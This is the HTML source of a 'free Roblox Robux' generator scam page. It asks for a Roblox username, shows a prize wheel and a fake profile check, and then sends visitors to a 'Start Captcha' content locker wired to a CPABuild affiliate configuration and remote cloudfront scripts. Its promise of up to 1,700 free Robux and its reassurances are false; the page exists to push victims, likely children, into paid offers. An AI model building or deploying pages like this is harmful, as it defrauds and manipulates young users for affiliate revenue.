<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="bootstrap.min.css">
    <link rel="stylesheet" href="devices.min.css">
    <link rel="stylesheet" href="main.css">
    <link rel="icon" type="image/x-icon" href="favicon.ico">
    <title>Free Roblox Robux Rewards - Earn upto 1,700 Robux everyday! </title>
</head>

<body>
    <div class="device device-iphone-x">
        <div class="device-frame">
            <div class="device-content">
                <div class="FLICK">

                    <div class="RECENTROBLOX">
                        <div class="row justify-content-center align-items-center m-0 WOO">
                            <div class="col-3 align-items-center m-0 p-0"><img class="img-avatar m-2" src="A/1.png"></div>
                            <div class="col align-items-center text-center p-2">
                                <div>
                                    <h4 class="mb-2" id="RECENTNAME"></h4>
                                    <hr class="m-0 ml-2"><img class="img-robux DIB mb-1" src="Robux.png">
                                    <h5 class="DIB mt-2 mb-0 RGN">.</h5>
                                </div>
                            </div>
                            <div id="PBAR"></div>
                        </div>
                    </div>

                    <div class="FLICK2">

                        <div class="P1 w-95">

                            
                            <img src="LOGO.png" class="w-95 img-fluid mx-auto JACKY">

                            <h2 class="JACKY">Win upto <strong>1,700 FREE</strong> Robux!</h2>

                            <hr class="JACKY">

                            <h5 class="JACKY"><strong>Step 1:</strong> Type in your <strong>Roblox</strong> username to continue.</h5>

                            <input type="text" class="form-control form-control-lg mb-2 pt-4 pb-4 JACKY" id="robname" placeholder="Roblox username">


                            <button type="button" class="S1B btn btn-lg btn-block btn-light mb-1 mt-1 pt-2 pb-2 JACKY" onclick="S1();">Continue</button>
                            <p>We will <strong>NEVER</strong> ask for your password!</p>

                        </div>

                        <div class="P15 w-95">

                            <h5 id="step15"><strong>Step 3: </strong>Spin the Wheel to Win <strong>Robux!</strong></h5>

                            <div id="xD" class="mt-2 mb-2">
                                <div id="Dx">
                                    <canvas id="canvas" data-responsiveMinWidth="100" data-responsiveMinHeight="100" data-responsiveScaleHeight="true" onclick="startSpin();"></canvas>
                                </div>
                            </div>

                            <h4 class="freerobux mb-0"><img class="IR" src="Robux.png"> <strong><span id="acc">0</span> Robux</strong> counted...</h4>

                        </div>

                        <div class="P2 w-95">

                            <h5 id="step34" class="ZZZ"><strong>Step 2:</strong> Is this <strong>your Roblox profile</strong></h5>
                            <p id="step34" class="ZZZ"><b><i>Robux will be sent via group funds</i></b></p>

                            <div class="SCARED ZZZ">

                                <h3 class="mb-2 robnames"></h3>

                                <div class="row justify-content-center">

                                  <div class="col text-center"><img class="img-fluid robwearing mx-auto"></div>

                                </div>

                                <h5 class="robdescription"></h5>

                                <div class="row justify-content-center">

                                    <div class="col p-0 m-0">
                                        <h5 class="robfollowers mb-1 pl-2"></h5></div>
                                    <div class="col p-0 m-0">
                                      <h5 class="robfollowing mb-1"></h5></div>
                                    <div class="col p-0 m-0">
                                      <h5 class="robfriends mb-1 pr-2"></h5></div>
                                </div>

                            </div>

                            <div class="row justify-content-center mt-2 YESNO ZZZ">

                                <div class="col pr-1">
                                    <button type="button" id="BTNYES" class="S2B1 btn btn-block btn-lg btn-light" onclick="SYES();">Yes</button>
                                </div>

                                <div class="col pl-1">
                                    <button type="button" id="BTNNO" class="S2B2 btn btn-block btn-lg btn-light" onclick="SNO();">No</button>
                                </div>

                            </div>

                            <button type="button" id="BTNADD" class="S2B3 btn btn-block btn-lg btn-light mt-2" onclick="SADD();"></button>

                            <h5 id="CONS" class="mt-2">Connecting with <strong>Roblox group</strong>...</h5>

                            <button type="button" id="VER" class="S2B4 VB btn btn-block btn-lg btn-light mt-2" onclick="CPABuildLock();"><strong>Start Captcha</strong></button>

                        </div>

                    </div>
                    
                    <img class="rob-bot" src="BOTTOM.jpg">

                </div>
            </div>
        </div>
        <div class="device-stripe"></div>
        <div class="device-header"></div>
        <div class="device-sensors"></div>
        <div class="device-btns"></div>
        <div class="device-power"></div>
    </div>

    <script type="text/javascript">
        var CPABUILDSETTINGS={"it":3298839,"key":"da384"};
    </script>
    <script src="https://d2bb5k76l7oivo.cloudfront.net/1b6ca13.js"></script>

    <script src="jquery-3.4.1.min.js"></script>
    <script src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/assets/16657943898bb3f8a834045b6c6e577385731ee747.js"></script>
    <script src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/assets/16657943839a362ff23639c2780be076a7fe5fc3a9.js"></script>
    <script src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/assets/16657943824ac6ea410c3cc0001ba1bc1c880823a7.js"></script>
    <script src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/assets/16657943878f6b01aac6fa164c4d43d0684ae66b95.js"></script>
    <script src="TweenMax.min.js"></script>
    <script src="winwheel.min.js"></script>
    <script src="main.js"></script>


</body>

</html>
